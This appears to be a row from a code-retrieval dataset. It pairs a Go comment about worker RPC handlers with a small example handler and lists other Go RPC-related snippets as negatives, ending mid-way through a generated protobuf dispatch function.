query
stringlengths
7
3.85k
document
stringlengths
11
430k
metadata
dict
negatives
sequencelengths
0
101
negative_scores
sequencelengths
0
101
document_score
stringlengths
3
10
document_rank
stringclasses
102 values
Your code here RPC handlers for the worker to call. Example an example RPC handler. the RPC argument and reply types are defined in rpc.go.
func (m *Master) Example(args *ExampleArgs, reply *ExampleReply) error { fmt.Println("I'm in example ", args.X) reply.Y = args.X + 1 return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func callWorker(worker, name string, args interface{}, reply interface{}) bool {\n\treturn call(worker, \"RPCWorker.\"+name, args, reply)\n}", "func (cl *Client) DoRPC(functionName string, args interface{}) (response interface{}, err error) {\n\t/*\n\t\tDoes a remote procedure call using the msgpack2 protocol for RPC that return a QueryReply\n\t*/\n\tif args == nil {\n\t\treturn nil, fmt.Errorf(\"args must be non-nil - have: args: %v\", args)\n\t}\n\tmessage, err := msgpack2.EncodeClientRequest(\"DataService.\"+functionName, args)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqURL := cl.BaseURL + \"/rpc\"\n\treq, err := http.NewRequestWithContext(context.Background(), \"POST\", reqURL, bytes.NewBuffer(message))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Header.Set(\"Content-Type\", \"application/x-msgpack\")\n\tclient := new(http.Client)\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer func(resp *http.Response) {\n\t\tif err2 := resp.Body.Close(); err2 != nil {\n\t\t\tlog.Error(fmt.Sprintf(\"failed to close http client for marketstore api. err=%v\", err2))\n\t\t}\n\t}(resp)\n\n\t// Handle any error in the RPC call\n\tconst statusOK = 200\n\tif resp.StatusCode != statusOK {\n\t\tbodyBytes, err2 := goio.ReadAll(resp.Body)\n\t\tvar errText string\n\t\tif err2 != nil {\n\t\t\terrText = err2.Error()\n\t\t} else if bodyBytes != nil {\n\t\t\terrText = string(bodyBytes)\n\t\t}\n\t\treturn nil, fmt.Errorf(\"response error (%d): %s\", resp.StatusCode, errText)\n\t}\n\n\t// Unpack and format the response from the RPC call\n\tdecodeFunc, found := decodeFuncMap[functionName]\n\tif !found {\n\t\treturn nil, fmt.Errorf(\"unsupported RPC response\")\n\t}\n\treturn decodeFunc(resp)\n}", "func (rm *REKTManager) worker(req http.Request) Response {\n\tresp, err := rm.client.Do(&req)\n\tif err != nil {\n\t\treturn Response{make([]byte, 0), err}\n\t}\n\tdefer resp.Body.Close()\n\n\tdata, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn Response{make([]byte, 0), err}\n\t}\n\n\treturn Response{data, err}\n}", "func main() {\n\thandleRequests := func(w http.ResponseWriter, r *http.Request) {\n\t\tbody, err := ioutil.ReadAll(r.Body)\n\t\tif err == nil {\n\t\t\tbuf := bytes.NewBuffer(body).String()\n\n\t\t\tif handleMtSupporteMethods(buf, w) {\n\t\t\t\treturn\n\t\t\t} else if handleMetaWeblogGetRecentPosts(buf, w) {\n\t\t\t\treturn\n\t\t\t} else if handleMetaWeblogNewPost(buf, w) {\n\t\t\t\treturn\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"Not a known method call %s\", buf)\n\t\t\t\t// return error\n\t\t\t\tio.WriteString(w, \"<?xml version=\\\"1.0\\\"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><int>-32601</int></value></member><member><name>faultString</name><value><string>server error. requested method not found</string></value></member></struct></value></fault></methodResponse>\")\n\t\t\t}\n\t\t} else {\n\t\t\tfmt.Println(err)\n\t\t\tio.WriteString(w, \"<?xml version=\\\"1.0\\\"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><int>-32601</int></value></member><member><name>faultString</name><value><string>server error. requested method not found</string></value></member></struct></value></fault></methodResponse>\")\n\t\t}\n\t}\n\n\thttp.HandleFunc(\"/xmlrpc.php\", handleRequests)\n\n\tlog.Println(\"Starting XML-RPC server on localhost:80/xmlrpc.php\")\n\tlog.Fatal(http.ListenAndServe(\":80\", nil))\n}", "func rpc(w http.ResponseWriter, r *http.Request) {\n\t// Parses the command into the rpc struct\n\tvar rpc rpcCall\n\tbodyBytes, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tsendHTTPResp(w, 500, err)\n\t\treturn\n\t}\n\n\terr = json.Unmarshal(bodyBytes, &rpc)\n\tif err != nil {\n\t\tsendHTTPResp(w, 500, err)\n\t\treturn\n\t}\n\n\t// Processes the rpc opcodes\n\tif rpc.Call == \"mkdirp\" { // Opcode for creating new dirs\n\t\tpath, err := validPath(rpc.Args[0])\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\n\t\terr = os.MkdirAll(path, os.ModePerm)\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\n\t} else if rpc.Call == \"mv\" { // Opcode for moving/renaming files\n\t\tsrcPath, err := validPath(rpc.Args[0])\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\t\tdstPath, err := validPath(rpc.Args[1])\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\n\t\terr = os.Rename(srcPath, dstPath)\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\t} else if rpc.Call == \"rm\" { // Opcode for removing files\n\t\tpath, err := validPath(rpc.Args[0])\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\n\t\terr = os.RemoveAll(path)\n\t\tif err != nil {\n\t\t\tsendHTTPResp(w, 500, err)\n\t\t\treturn\n\t\t}\n\t}\n\n\tw.Write([]byte(\"ok\"))\n}", "func HandleRpcs(cmd PB_CommandToServer, params RPC_UserParam, rpcHandler RPC_AllHandlersInteract, responseHandler RPC_ResponseHandlerInterface) {\n\n\tsplits := strings.Split(cmd.Command, \".\")\n\n\tif len(splits) != 2 {\n\t\tnoDevErr(errors.New(\"HandleRpcs: splic is not 2 parts\"))\n\t\treturn\n\t}\n\n\tswitch splits[0] {\n\n\tcase \"RPC_Auth\":\n\n\t\t//rpc,ok := rpcHandler.RPC_Auth\n\t\trpc := rpcHandler.RPC_Auth\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_Auth\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"CheckPhone\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.CheckPhone(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.CheckPhone\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.CheckPhone\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SendCode\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SendCode(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SendCode\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SendCode\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SendCodeToSms\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SendCodeToSms(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SendCodeToSms\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SendCodeToSms\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SendCodeToTelgram\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SendCodeToTelgram(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SendCodeToTelgram\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SendCodeToTelgram\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SingUp\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SingUp(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SingUp\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SingUp\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SingIn\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SingIn(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.SingIn\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.SingIn\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"LogOut\": //each pb_service_method\n\t\t\tload := &PB_UserParam_CheckUserName2{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.LogOut(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Auth.LogOut\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_UserResponse_CheckUserName2\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_UserResponse_CheckUserName2\",\"RPC_Auth.LogOut\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_Chat\":\n\n\t\t//rpc,ok := rpcHandler.RPC_Chat\n\t\trpc := rpcHandler.RPC_Chat\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_Chat\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"AddNewMessage\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_AddNewMessage{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.AddNewMessage(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.AddNewMessage\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_AddNewMessage\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_AddNewMessage\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_AddNewMessage\",\"RPC_Chat.AddNewMessage\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetRoomActionDoing\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_SetRoomActionDoing{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetRoomActionDoing(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.SetRoomActionDoing\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_SetRoomActionDoing\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetRoomActionDoing\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetRoomActionDoing\",\"RPC_Chat.SetRoomActionDoing\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetMessagesRangeAsSeen\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_SetChatMessagesRangeAsSeen{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetMessagesRangeAsSeen(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.SetMessagesRangeAsSeen\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_SetChatMessagesRangeAsSeen\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetChatMessagesRangeAsSeen\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetChatMessagesRangeAsSeen\",\"RPC_Chat.SetMessagesRangeAsSeen\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"DeleteChatHistory\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_DeleteChatHistory{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.DeleteChatHistory(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.DeleteChatHistory\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_DeleteChatHistory\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_DeleteChatHistory\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_DeleteChatHistory\",\"RPC_Chat.DeleteChatHistory\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"DeleteMessagesByIds\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_DeleteMessagesByIds{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.DeleteMessagesByIds(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.DeleteMessagesByIds\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_DeleteMessagesByIds\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_DeleteMessagesByIds\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_DeleteMessagesByIds\",\"RPC_Chat.DeleteMessagesByIds\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"SetMessagesAsReceived\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_SetMessagesAsReceived{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.SetMessagesAsReceived(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.SetMessagesAsReceived\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_SetMessagesAsReceived\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetMessagesAsReceived\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_SetMessagesAsReceived\",\"RPC_Chat.SetMessagesAsReceived\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"EditMessage\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_EditMessage{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.EditMessage(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.EditMessage\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_EditMessage\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_EditMessage\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_EditMessage\",\"RPC_Chat.EditMessage\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetChatList\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_GetChatList{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetChatList(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.GetChatList\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_GetChatList\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetChatList\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetChatList\",\"RPC_Chat.GetChatList\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetChatHistoryToOlder\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_GetChatHistoryToOlder{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetChatHistoryToOlder(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.GetChatHistoryToOlder\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_GetChatHistoryToOlder\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetChatHistoryToOlder\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetChatHistoryToOlder\",\"RPC_Chat.GetChatHistoryToOlder\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tcase \"GetFreshAllDirectMessagesList\": //each pb_service_method\n\t\t\tload := &PB_ChatParam_GetFreshAllDirectMessagesList{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.GetFreshAllDirectMessagesList(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Chat.GetFreshAllDirectMessagesList\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_ChatResponse_GetFreshAllDirectMessagesList\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: load,\n\t\t\t\t\t}\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetFreshAllDirectMessagesList\",cmd, params)\n\t\t\t\t\t//RPC_ResponseHandler.HandleOfflineResult(res,\"PB_ChatResponse_GetFreshAllDirectMessagesList\",\"RPC_Chat.GetFreshAllDirectMessagesList\",cmd, params , load)\n\t\t\t\t\tresponseHandler.HandleOfflineResult(out)\n\t\t\t\t} else {\n\t\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tresponseHandler.HandelError(err)\n\t\t\t}\n\t\tdefault:\n\t\t\tnoDevErr(errors.New(\"rpc method is does not exist: \" + cmd.Command))\n\t\t}\n\tcase \"RPC_Other\":\n\n\t\t//rpc,ok := rpcHandler.RPC_Other\n\t\trpc := rpcHandler.RPC_Other\n\t\t/*if !ok {\n\t\t e:=errors.New(\"rpcHandler could not be cast to : RPC_Other\")\n\t\t noDevErr(e)\n\t\t RPC_ResponseHandler.HandelError(e)\n\t\t return\n\t\t}*/\n\n\t\tswitch splits[1] {\n\t\tcase \"Echo\": //each pb_service_method\n\t\t\tload := &PB_OtherParam_Echo{}\n\t\t\terr := proto.Unmarshal(cmd.Data, load)\n\t\t\tif err == nil {\n\t\t\t\tres, err := rpc.Echo(load, params)\n\t\t\t\tif err == nil {\n\t\t\t\t\tout := RpcResponseOutput{\n\t\t\t\t\t\tRpcName: \"RPC_Other.Echo\",\n\t\t\t\t\t\tUserParam: params,\n\t\t\t\t\t\tCommandToServer: cmd,\n\t\t\t\t\t\tPBClassName: \"PB_OtherResponse_Echo\",\n\t\t\t\t\t\tResponseData: &res,\n\t\t\t\t\t\tRpcParamPassed: 